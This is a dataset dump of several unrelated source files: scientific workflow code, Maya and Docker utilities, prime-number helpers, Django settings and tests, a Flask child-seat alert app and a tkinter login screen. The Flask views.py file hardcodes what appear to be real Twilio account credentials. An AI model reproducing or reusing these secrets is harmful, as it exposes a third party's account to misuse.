Uses {} fit.'.format(gs_structure.get_formula(), self.ctx.fitfunc_gs_out)\n outdict['gs_structure_uuid'] = gs_structure.uuid\n\n # create output nodes in dict with link names\n outnode = Dict(dict=outdict)\n outnode.store()\n outnodes = {'eos_results': outnode}\n if self.ctx.successful and self.ctx.return_gs_struc:\n outnodes['gs_structure'] = gs_structure\n if self.ctx.use_primitive_structure:\n outnodes['explicit_kpoints'] = explicit_kpoints\n outnodes['get_explicit_kpoints_path_parameters'] = parameters\n # set out nodes and corresponding link names\n for link_name, node in outnodes.items():\n self.out(link_name, node)\n\n\n### Helper functions and workfunctions ###\n\ndef rescale_no_wf(structure, scale):\n \"\"\"\n Rescales a crystal structure. DOES NOT keep the provanence in the database.\n\n :param structure, a StructureData node (pk, or uuid)\n :param scale, float scaling factor for the cell\n\n :returns: New StrcutureData node with rescalled structure, which is linked to input Structure\n and None if inp_structure was not a StructureData\n\n copied and modified from aiida_fleur.tools.StructureData_util\n \"\"\"\n\n the_ase = structure.get_ase()\n new_ase = the_ase.copy()\n new_ase.set_cell(the_ase.get_cell()*float(scale), scale_atoms=True)\n rescaled_structure = DataFactory('structure')(ase=new_ase)\n\n return rescaled_structure\n\n@calcfunction\ndef rescale(inp_structure, scale):\n \"\"\"\n Rescales a crystal structure. Keeps the provanance in the database.\n\n :param inp_structure, a StructureData node (pk, or uuid)\n :param scale, float scaling factor for the cell\n\n :returns: New StrcutureData node with rescalled structure, which is linked to input Structure\n and None if inp_structure was not a StructureData\n\n copied and modified from aiida_fleur.tools.StructureData_util\n \"\"\"\n\n return rescale_no_wf(inp_structure, scale)\n\n\n@calcfunction\ndef get_primitive_structure(structure, return_all):\n \"\"\"\n calls get_explicit_kpoints_path which gives primitive structure\n auxiliary workfunction to keep provenance\n \"\"\"\n from aiida.tools import get_explicit_kpoints_path\n output = get_explicit_kpoints_path(structure)\n conv_structure = output['conv_structure']\n explicit_kpoints = output['explicit_kpoints']\n parameters = output['parameters']\n primitive_structure = output['primitive_structure']\n if return_all:\n return {'conv_structure':conv_structure, 'explicit_kpoints':explicit_kpoints, 'parameters':parameters, 'primitive_structure':primitive_structure}\n else:\n return primitive_structure\n","sub_path":"aiida_kkr/workflows/eos.py","file_name":"eos.py","file_ext":"py","file_size_in_byte":25439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"502949984","text":"import pymel.core as pm\n\ndef get_matrix_along_axis(obj, axis=0, scale=10):\n '''Returns a transformation matrix for the position in worldspace along an \n axis of the specified transform. 
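The collect_data_and_fit step above delegates the actual equation-of-state fit to an external EquationOfState class. A minimal standalone sketch, assuming that name resolves to ase.eos.EquationOfState (ASE installed) and using made-up volume/energy pairs for illustration:

```python
# Sketch of the E(V) fit the workflow relies on; the numbers are fake.
from ase.eos import EquationOfState

volumes = [13.7, 14.2, 14.7, 15.2, 15.7]             # cell volume per atom (Ang^3)
energies = [-56.46, -56.52, -56.54, -56.52, -56.47]  # total energy per atom (eV)

eos = EquationOfState(volumes, energies, eos='birchmurnaghan')
v0, e0, B = eos.fit()  # equilibrium volume, minimum energy, bulk modulus
print(v0, e0, B)
```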
The scale param will multiply the normalized vector.'''\n\n    if not isinstance(obj, pm.nodetypes.Transform):\n        pm.warning('The object needs to be of type Transform')\n        return\n\n    if axis < 0 or axis > 2 or not isinstance(axis, int):\n        pm.warning('param axis needs to be an int in the range 0-2')\n        return\n\n    if not (isinstance(scale, float) or isinstance(scale, int)):\n        pm.warning('scale needs to be an int or float')\n        return\n\n    # get the transformation matrix\n    tm = pm.datatypes.TransformationMatrix(obj.getMatrix(ws=True))\n\n    # get the displacement vector\n    vec = pm.datatypes.Vector(tm[axis][0],tm[axis][1],tm[axis][2])\n\n    # get the position\n    pos = pm.datatypes.Vector(tm[3][0],tm[3][1],tm[3][2])\n\n    # get the rotation matrix\n    rot_matrix = pm.datatypes.TransformationMatrix(tm.asRotateMatrix())\n\n    # add the translation\n    rot_matrix.addTranslation(pos + (vec*scale), space='world')\n\n    # visual debug\n    pm.curve(d=1, p=[pos, pos + vec*scale])\n\n    # apply the matrix\n    #loc.setMatrix(rot_matrix)\n    #loc.setTranslation(pos + x_axis*10)\n    #loc.setMatrix(rot_matrix)\n\n    return rot_matrix\n\n#obj = pm.PyNode('pCube1')\nobj = pm.ls(sl=True)[0]\nloc = pm.spaceLocator()\ntm = get_matrix_along_axis(obj, axis=1, scale=10)\nloc.setMatrix(tm)","sub_path":"t_matrix.py","file_name":"t_matrix.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"565053110","text":"from dagster import Array, Field, Permissive, StringSource, check\nfrom docker_image import reference\n\nDOCKER_CONFIG_SCHEMA = {\n    \"image\": Field(\n        StringSource,\n        is_required=False,\n        description=\"The docker image to be used if the repository does not specify one.\",\n    ),\n    \"registry\": Field(\n        {\n            \"url\": Field(StringSource),\n            \"username\": Field(StringSource),\n            \"password\": Field(StringSource),\n        },\n        is_required=False,\n        description=\"Information for using a non local/public docker registry\",\n    ),\n    \"env_vars\": Field(\n        [str],\n        is_required=False,\n        description=\"The list of environment variable names to forward to the docker container\",\n    ),\n    \"network\": Field(\n        StringSource,\n        is_required=False,\n        description=\"Name of the network to which to connect the launched container at creation time\",\n    ),\n    \"networks\": Field(\n        Array(StringSource),\n        is_required=False,\n        description=\"Names of the networks to which to connect the launched container at creation time\",\n    ),\n    \"container_kwargs\": Field(\n        Permissive(),\n        is_required=False,\n        description=\"key-value pairs that can be passed into containers.create. See \"\n        \"https://docker-py.readthedocs.io/en/stable/containers.html for the full list \"\n        \"of available options.\",\n    ),\n}\n\n\ndef validate_docker_config(network, networks, container_kwargs):\n    if network:\n        check.invariant(not networks, \"cannot set both `network` and `networks`\")\n\n    if container_kwargs:\n        if \"image\" in container_kwargs:\n            raise Exception(\n                \"'image' cannot be used in 'container_kwargs'. Use the 'image' config key instead.\"\n            )\n\n        if \"environment\" in container_kwargs:\n            raise Exception(\n                \"'environment' cannot be used in 'container_kwargs'. Use the 'env_vars' config key instead.\"\n            )\n\n        if \"network\" in container_kwargs:\n            raise Exception(\n                \"'network' cannot be used in 'container_kwargs'. 
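The PyMEL helper above is plain matrix bookkeeping: one basis row of the 4x4 world matrix is the axis direction, and row 3 holds the translation. A library-free sketch of the same math, assuming a row-major matrix layout like PyMEL's:

```python
# Offset a position along one basis axis of a 4x4 transform matrix.
import numpy as np

def point_along_axis(matrix4x4, axis=0, scale=10.0):
    m = np.asarray(matrix4x4, dtype=float)
    direction = m[axis, :3]  # x/y/z basis row of the transform
    position = m[3, :3]      # translation row
    return position + direction * scale

print(point_along_axis(np.eye(4), axis=1, scale=10.0))  # -> [ 0. 10.  0.]
```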
Use the 'network' config key instead.\"\n            )\n\n\ndef validate_docker_image(docker_image):\n    try:\n        # validate that the docker image name is valid\n        reference.Reference.parse(docker_image)\n    except Exception as e:\n        raise Exception(\n            \"Docker image name {docker_image} is not correctly formatted\".format(\n                docker_image=docker_image\n            )\n        ) from e\n","sub_path":"python_modules/libraries/dagster-docker/dagster_docker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"280053180","text":"import math\n\n\ndef isprime(y):\n    \"\"\"Return True if input is prime, return False if it is not.\"\"\"\n    if y < 2:\n        return False  # 0, 1 and negative numbers are not prime\n    if y <= 3:\n        return True\n    x = math.ceil(math.sqrt(y))\n    z = 2\n    while z <= x:\n        if y % z == 0:\n            return False\n        else:\n            z += 1\n    return True\n\n\ndef prdiv(a):\n    \"\"\"Return the prime factorization of input, of form (base, exponent)\"\"\"\n    answ = []\n    count = 2\n    while count <= a:\n        exp = 0\n        if isprime(count) is True:\n            while a % count == 0:\n                a = a // count\n                exp += 1\n            if a == 1:\n                answ.append((count, exp))\n                return answ\n            if exp != 0:\n                answ.append((count, exp))\n            count += 1\n        else:\n            count += 1\n    return answ\n\n\ndef prunder(max):\n    \"\"\"Return all primes under a certain value in a list\"\"\"\n    c = 0\n    answ = []\n    while c <= max:\n        if isprime(c) is True:\n            answ.append(c)\n            c += 1\n        else:\n            c += 1\n    return answ\n\n# Under implementation. Do not use\n\n\ndef b_prunder(number):\n    from tqdm import tqdm\n    primes = [2, 3]\n\n    for c in tqdm(range(5, number, 2)):  # check odd candidates only\n        for prime in primes:\n            if c % prime == 0:\n                break\n        else:\n            primes.append(c)\n\n    return primes\n    # this works up to 200k. When trying to do it for 2000k, it stops working\n\n\nprint(sum(prunder(2000000)))\n\nprint(prdiv(1236))\n","sub_path":"PythonCode/Project Euler/prtools.py","file_name":"prtools.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"626337986","text":"import os\nfrom decouple import config, Csv\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nSECRET_KEY = config('SECRET_KEY')\n\nDEBUG = config('DEBUG', default=True, cast=bool)\n\n# pass a list of email addresses\nADMINS = config('ADMINS', default=[], cast=lambda v: [tuple(['Admin', e]) for e in v.split(',')] if v else [])\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())\n\n\nINSTALLED_APPS = [\n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'footballchief',\n    'rest_framework',\n    'rest_framework.authtoken',\n    'corsheaders',\n    'django_filters',\n]\n\nMIDDLEWARE = [\n    'corsheaders.middleware.CorsMiddleware',\n    'django.middleware.security.SecurityMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nCORS_ORIGIN_WHITELIST = config('CORS_ORIGIN_WHITELIST', cast=Csv())\n\nROOT_URLCONF = 'urls'\n\nTEMPLATES = [\n    {\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\n        'APP_DIRS': True,\n        'OPTIONS': {\n            'context_processors': 
[\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': config('DB_ENGINE'),\n 'NAME': config('DB_NAME'),\n 'USER': config('DB_USER'),\n 'PASSWORD': config('DB_PASSWORD'),\n 'HOST': config('DB_HOST'),\n 'PORT': config('DB_PORT', cast=int),\n 'CONN_MAX_AGE': 600,\n }\n}\n\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n 'DEFAULT_RENDERER_CLASSES': (\n 'djangorestframework_camel_case.render.CamelCaseJSONRenderer',\n ),\n\n 'DEFAULT_PARSER_CLASSES': (\n 'djangorestframework_camel_case.parser.CamelCaseJSONParser',\n ),\n 'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)\n}\n\nAUTH_USER_MODEL = 'footballchief.User'\n\n# allow non-active users to log in. they won't show up in the rankings\nAUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.AllowAllUsersModelBackend']\n\n\nEMAIL_BACKEND = config('EMAIL_BACKEND')\nEMAIL_HOST = config('EMAIL_HOST', default=None)\nEMAIL_PORT = config('EMAIL_PORT', default=None)\nEMAIL_HOST_USER = config('EMAIL_HOST_USER', default=None)\nEMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD', default=None)\nEMAIL_USE_TLS = config('EMAIL_USE_TLS', default=None)\nDEFAULT_FROM_EMAIL = config('DEFAULT_FROM_EMAIL', default=None)\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n\nFRONTEND_URL = config('FRONTEND_URL')","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577994802","text":"from flask import render_template, request, session, redirect, url_for\nfrom flask_login import login_required\nfrom project.forms import AddContactForm\nfrom project import db\nfrom project.models import User\n\nfrom sqlalchemy import update\nimport os\nfrom twilio.rest import Client\nimport threading\nfrom project.tasks import alert, revoke\n#from celery.task.control import revoke\n\nfrom . import app\n\n#NEED = 0\n#USER = 0\n\n'''\n#Mahd's phone:\nACC_SID = \"ACefef234a7dcd3cb22413db1ecab742a5\"\nAUTH_TOKEN = \"4a6cd830f3a7b69ec5cae4fde76e34b9\"\nFROM = \"+18604312585\"\nBODY = \"YOUR BABY MIGHT BE IN DANGER! CHECK YOUR CAR!\"\n\n'''\n\n#Mahd's phone:\nACC_SID = \"ACefef234a7dcd3cb22413db1ecab742a5\"\nAUTH_TOKEN = \"4a6cd830f3a7b69ec5cae4fde76e34b9\"\nFROM = \"+18647546228\"\nBODY = \"YOUR BABY MIGHT BE IN DANGER! 
CHECK YOUR CAR!\"\n\n@app.route('/')\ndef index():\n\treturn render_template('landingpage.html')\n\n\n@app.route('/team')\ndef team():\n    return render_template('team.html')\n\n@app.route('/info')\ndef info():\n    return render_template('info.html')\n\n@app.route('/account', methods=['GET'])\n@login_required\ndef account():\n\tform = AddContactForm()\n\tuser = User.query.filter_by(id=session['user_id']).first()\n\tsession['user_id'] = user.id\n\treturn render_template('private.html', user=user, form=form)\n\n@app.route('/test')\n@login_required\ndef check():\n\tuser = User.query.filter_by(username=session['name']).first()\n\tuser.flag = 1\n\tdb.session.commit()\n\treturn 'OK'  # a Flask view must return a response\n\n@app.route('/private', methods=['GET','POST'])\n@login_required\ndef private():\n\treturn redirect(url_for('account'))\n\n@app.route('/add_contact/<int:contact_num>', methods=['POST'])\ndef add_contact(contact_num):\n\t# form = AddContactForm(request.form)\n\tprint(request.form)\n\tuser = User.query.filter_by(id=session['user_id']).first()\n\tif contact_num == 1:\n\t\tuser.name1 = request.form['name1']\n\t\tuser.relation1 = request.form['relation1']\n\t\tuser.phone1 = request.form['phone1']\n\telif contact_num == 2:\n\t\tuser.name2 = request.form['name2']\n\t\tuser.relation2 = request.form['relation2']\n\t\tuser.phone2 = request.form['phone2']\n\telif contact_num == 3:\n\t\tuser.name3 = request.form['name3']\n\t\tuser.relation3 = request.form['relation3']\n\t\tuser.phone3 = request.form['phone3']\n\telse:\n\t\treturn redirect(url_for('account'))\n\tdb.session.commit()\n\t'''if request.method == 'POST':\n\t\tprint(form)'''\n\treturn redirect(url_for('account'))\n\t'''name=form.name.data\n\trelation = form.relation.data\n\tnumber= form.number.data'''\n\t'''user = User.query.filter_by(username=username).first()\n\tuser = User(name, relation, number)\n\tdb.session.add(user)\n\tdb.session.commit()\n\tlogin_user(user, remember=True)\n\tnext_page = request.args.get('next')\n\tif not next_page or url_parse(next_page).netloc != '':\n\t    next_page = url_for('account')\n\treturn redirect(url_for('account'))'''\n\n\n@app.route('/booster_seat_alert/<booster_seat_id>', methods=[\"GET\",\"POST\"])\ndef booster_seat_alert(booster_seat_id):\n\t# GET: show a button on a template which will send a POST request for this booster\n\t# POST: set flag to 1 for the user this booster belongs to\n\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\tif request.method == \"POST\":\n\t\tuser.flag = 1\n\t\tif user.task_id:\n\t\t\trevoke(user.task_id)\n\t\ttask = alert.delay(user.number, user.flag, user.phone1, user.phone2, user.phone3)\n\t\tuser.task_id = str(task.id)\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('booster_seat_stop', booster_seat_id=booster_seat_id))\n\telse:\n\t\treturn render_template('sendmessage.html', booster_seat_id=booster_seat_id, user=user)\n\n\n@app.route('/booster_seat_stop/<booster_seat_id>', methods=[\"GET\",\"POST\"])\ndef booster_seat_stop(booster_seat_id):\n\t# GET: show a button on a template which will send a POST request for this booster\n\t# POST: set flag to 0 for the user this booster belongs to\n\tuser = User.query.filter_by(booster_seat_id=booster_seat_id).first()\n\tif request.method == 'POST':\n\t\tuser.flag = 0\n\t\trevoke(user.task_id)\n\t\tuser.task_id = 0\n\t\tdb.session.commit()\n\t\treturn redirect(url_for('booster_seat_alert', booster_seat_id=booster_seat_id))\n\telse:\n\t\treturn 
render_template('stopmessage.html',booster_seat_id=booster_seat_id, user = user)\n\n\t##GET : show a button on a template which will send POST request for this booster\n \t# POST: set flag to 0 for the user this booster belongs to\n\n","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574707046","text":"import logging\n\nfrom django.test import TestCase\n\nfrom bearing.parser import BearingParser\n\nlogger = logging.getLogger()\n\n\nclass RollingBearingTest(TestCase):\n\n def check_result(self, data):\n for item, result in data.items():\n parser = BearingParser.parse(item)\n self.assertEqual(parser.bearing_type, result['bearing_type'])\n self.assertEqual(parser.bearing_design, result['bearing_design'])\n self.assertEqual(parser.full_name, result['full_name'])\n print('.... OK')\n\n def test_simple(self):\n print('Running RollingBearingTest.test_simple_parser')\n data = {\n '112': {'bearing_type': '0', 'bearing_design': '00', 'full_name': '0000112'},\n '42308': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '0042308'},\n '3056201': {'bearing_type': '6', 'bearing_design': '05', 'full_name': '3056201'},\n }\n self.check_result(data)\n\n def test_prefix(self):\n print('Running RollingBearingTest.test_prefix')\n data = {\n '5-1200': {'bearing_type': '1', 'bearing_design': '00', 'full_name': '5-0001200'},\n '5-60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5- 60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5 -60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n '5 - 60066': {'bearing_type': '0', 'bearing_design': '06', 'full_name': '5-0060066'},\n }\n self.check_result(data)\n\n def test_suffix(self):\n print('Running RollingBearingTest.test_suffix')\n data = {\n '2318М': {'bearing_type': '2', 'bearing_design': '00', 'full_name': '0002318 М'},\n '2318 М': {'bearing_type': '2', 'bearing_design': '00', 'full_name': '0002318 М'},\n '46205Р': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '0046205 Р'},\n '46215 Л': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '0046215 Л'},\n }\n self.check_result(data)\n\n def test_complex(self):\n print('Running RollingBearingTest.test_complex')\n data = {\n '5-210 Р': {'bearing_type': '0', 'bearing_design': '00', 'full_name': '5-0000210 Р'},\n '5-46108Е5': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '5-0046108 Е5'},\n '6-42314 М1Ш1': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '6-0042314 М1Ш1'},\n '6 - 1046915 Д': {'bearing_type': '6', 'bearing_design': '04', 'full_name': '6-1046915 Д'},\n '30 -42726Е2М': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '30-0042726 Е2М'},\n '30 - 42726Е2 М': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '30-0042726 Е2М'},\n '2В70-42609 ЛЗМ': {'bearing_type': '2', 'bearing_design': '04', 'full_name': '2В70-0042609 ЛЗМ'},\n }\n self.check_result(data)\n","sub_path":"app/tests/test_rolling_bearings.py","file_name":"test_rolling_bearings.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"372061675","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as 
pd\n\npartition=0.8\n\ndata=pd.read_csv(\"./RawData.txt\")\n#data.drop(columns=\"date\",inplace=True,axis=1)\ndata=data.values\nlength=10*int(data.shape[0]*partition/10)\ntrainData=data[:length]\ntestData=data[length:]\n\ntrainInput=trainData[:,:-1]\ntrainInput=pd.DataFrame(trainInput)\ntrainInput=(trainInput-trainInput.mean())/trainInput.std()\ntrainInput=trainInput.values\ntrainLabel=trainData[:,-1]\n\ntestInput=testData[:,:-1]\ntestLabel=testData[:,-1]\ntestInput=pd.DataFrame(testInput)\ntestInput=(testInput-testInput.mean())/testInput.std()\ntestInput=testInput.values\n\nnp.savetxt(\"trainData.txt\",trainInput)\nnp.savetxt(\"testData.txt\",testInput)\nnp.savetxt(\"trainLabel.txt\",trainLabel)\nnp.savetxt(\"testLabel.txt\",testLabel)\n","sub_path":"python/MTSC/RNN/LabelExtraction.py","file_name":"LabelExtraction.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377250696","text":"from typing import List\n\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n res = []\n track = []\n\n def backtrack(s, track):\n if not s:\n res.append(track)\n\n for i in range(1, len(s) + 1):\n if s[:i] == s[:i][::-1]:\n backtrack(s[i:], track + [s[:i]])\n\n backtrack(s, track)\n\n return res\n","sub_path":"palindrome-partitioning/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13358077","text":"# Core Django imports.\nfrom django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.test import TestCase\nfrom django.urls import reverse\n\n# Third-party Django app imports.\nfrom model_mommy import mommy\n\n# Blog application imports.\nfrom blog.models.article_models import Article\nfrom blog.models.author_models import Profile\n\n\nclass AuthorsListViewTestCase(TestCase):\n \"\"\"\n Class to test the list of all authors\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Set up all the test using django client\n\n Model mommy creates three users and store them in a\n list called authors and you can access each of them using indices.\n\n In the view, it returns all the users and you can access every users\n profile details through the user's model.\n \"\"\"\n self.client = Client()\n self.authors = mommy.make(User, _quantity=3)\n\n def test_authors_list_view_status_code(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(response.status_code, 200)\n\n def test_authors_list_view_url_by_name(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(response.status_code, 200)\n\n def test_if_authors_list_view_uses_correct_template(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertTemplateUsed(response, 'blog/authors/authors_list.html')\n\n def test_if_authors_list_view_does_not_contain_incorrect_html(self):\n response = self.client.get('')\n self.assertNotContains(response, \"BONA\")\n\n def test_if_author_list_view_returns_the_right_number_of_authors(self):\n response = self.client.get(reverse('blog:authors_list'))\n self.assertEqual(len(response.context_data['authors']), 3)\n\n # def test_if_author_list_view_returns_the_right_author_details(self):\n # response = self.client.get(reverse('blog:authors_list'))\n # self.assertEqual(response.context_data['authors'][0].profile,\n # self.authors[0].profile)\n # 
self.assertEqual(response.context_data['authors'][0].first_name,\n # self.authors[0].first_name)\n # self.assertEqual(response.context_data['authors'][0].last_name,\n # self.authors[0].last_name)\n # self.assertEqual(response.context_data['authors'][0].email,\n # self.authors[0].email)\n # self.assertEqual(response.context_data['authors'][0].username,\n # self.authors[0].username)\n # self.assertEqual(response.context_data['authors'][0].profile.image,\n # self.authors[0].profile.image)\n\n\nclass AuthorArticlesListViewTestCase(TestCase):\n \"\"\"\n Class to test a particular author's articles.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup all the tests using django client and model_mommy.\n \"\"\"\n self.client = Client()\n self.author = mommy.make(User)\n self.articles = mommy.make(Article, body=\"Test\", author=self.author, _quantity=5)\n\n def test_author_article_list_view_url_by_name(self):\n response = self.client.get(reverse('blog:author_articles',\n kwargs={\n 'username':\n self.author.username}\n )\n )\n self.assertEqual(response.status_code, 200)\n\n def test_if_author_article_list_view_uses_correct_template(self):\n response = self.client.get(reverse('blog:author_articles',\n kwargs={\n 'username':\n self.author.username}\n )\n )\n self.assertTemplateUsed(response, 'blog/authors/author_articles.html')\n\n # def test_if_author_article_list_view_returns_the_right_author_details(self):\n # response = self.client.get(reverse('blog:author_articles',\n # kwargs={\n # 'username':\n # self.author.username}\n # )\n # )\n #\n # self.assertEqual(response.context_data[\"articles\"][0].author.id,\n # self.author.id)\n # self.assertEqual(response.context_data[\"articles\"][0].author.first_name,\n # self.author.first_name)\n # self.assertEqual(response.context_data[\"articles\"][0].author.last_name,\n # self.author.last_name)\n # self.assertEqual(response.context_data[\"articles\"][0].author.email,\n # self.author.email)\n # self.assertEqual(response.context_data[\"articles\"][0].author.username,\n # self.author.username)\n # self.assertEqual(response.context_data[\"articles\"][0].author.profile.image,\n # self.author.profile.image)\n\n # def test_if_author_article_list_view_returns_the_right_article_details(self):\n # \"\"\"\n # This test checks if the view returns the right articles according to the\n # date they were published.\n #\n # In the setup, model mommy creates five articles and store\n # them in a list called articles. 
So the last article in the list will\n # be the first article in the list view since it was created last by model\n # mommy.\n # The list view orders articles according to the time they were published\n # so the last article in the articles list will be displayed first in the\n # view.\n # \"\"\"\n # response = self.client.get(reverse('blog:author_articles',\n # kwargs={\n # 'username':\n # self.author.username}\n # )\n # )\n #\n # self.assertEqual(response.context_data['articles'][0].author,\n # self.articles[4].author)\n # self.assertEqual(response.context_data['articles'][0].title,\n # self.articles[4].title)\n # self.assertEqual(response.context_data['articles'][0].slug,\n # self.articles[4].slug)\n # self.assertEqual(response.context_data['articles'][0].author,\n # self.articles[4].author)\n # self.assertEqual(response.context_data['articles'][0].image,\n # self.articles[4].image)\n # self.assertEqual(response.context_data['articles'][0].body,\n # self.articles[4].body)\n # self.assertEqual(response.context_data['articles'][0].date_published,\n # self.articles[4].date_published)\n # self.assertEqual(response.context_data['articles'][0].date_created,\n # self.articles[4].date_created)\n # self.assertEqual(response.context_data['articles'][0].status,\n # self.articles[4].status)","sub_path":"blog/tests/views/test_author_views.py","file_name":"test_author_views.py","file_ext":"py","file_size_in_byte":7408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217332711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 16 06:59:56 2021\r\n@author: dockt\r\n\"\"\"\r\nimport datetime\r\nimport sqlite3\r\nimport locale\r\nimport pytz\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom tkcalendar import Calendar\r\n\r\nroot = Tk()\r\nn1 = DoubleVar()\r\nn2 = DoubleVar()\r\nr = DoubleVar()\r\nconexion = sqlite3.connect(\"PythonEjercicio.db\")\r\ncursor = conexion.cursor()\r\nroot.title(\"PythonEjercicio\")\r\nroot.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\nroot.resizable(0,0)\r\ntexto = StringVar()\r\ntexto.set(\"\")\r\nnewTime = None\r\nnewDate = None\r\nresultadoAuto = None\r\nrun = False\r\ndef inicio():\r\n vncmd = (root.register(on_validateN),'%S', '%P')\r\n\r\n ConexionBDU()\r\n global mesg\r\n mesg = StringVar()\r\n mesg.set(\"Iniciar sesion\")\r\n \r\n global msg\r\n msg = Label(root,font=(\"Arial Bold\", 15))\r\n msg.grid(row=0)\r\n msg.config(textvariable=mesg, relief=\"ridge\", justify=\"center\")\r\n\r\n\r\n global labelUsr\r\n labelUsr = Label(root, text=\"Usuario:\",font=(\"Arial Bold\", 10))\r\n labelUsr.grid(row=1, padx=50, pady=5)\r\n labelUsr.config(justify=\"center\")\r\n\r\n global entryUsr\r\n entryUsr = Entry(root,validate=\"key\", validatecommand=vncmd)\r\n entryUsr.grid(row=2, padx=5, pady=5)\r\n entryUsr.config(justify=\"center\", state=\"normal\")\r\n\r\n\r\n global labelPass\r\n labelPass = Label(root, text=\"Contraseña:\",font=(\"Arial Bold\", 10))\r\n labelPass.grid(row=3, padx=5, pady=5)\r\n \r\n \r\n global entryPass\r\n entryPass = Entry(root,validate=\"key\", validatecommand=vncmd)\r\n entryPass.grid(row=4, padx=5, pady=5)\r\n entryPass.config(justify=\"center\", show=\"*\")\r\n\r\n global button_acceder\r\n button_acceder = StringVar()\r\n button_acceder.set(\"Acceder\")\r\n\r\n global acc\r\n acc = Button(root, textvariable=button_acceder, command=acceder,font=(\"Arial Bold\", 10))\r\n acc.grid(row=5, padx=5, pady=5)\r\n\r\n 
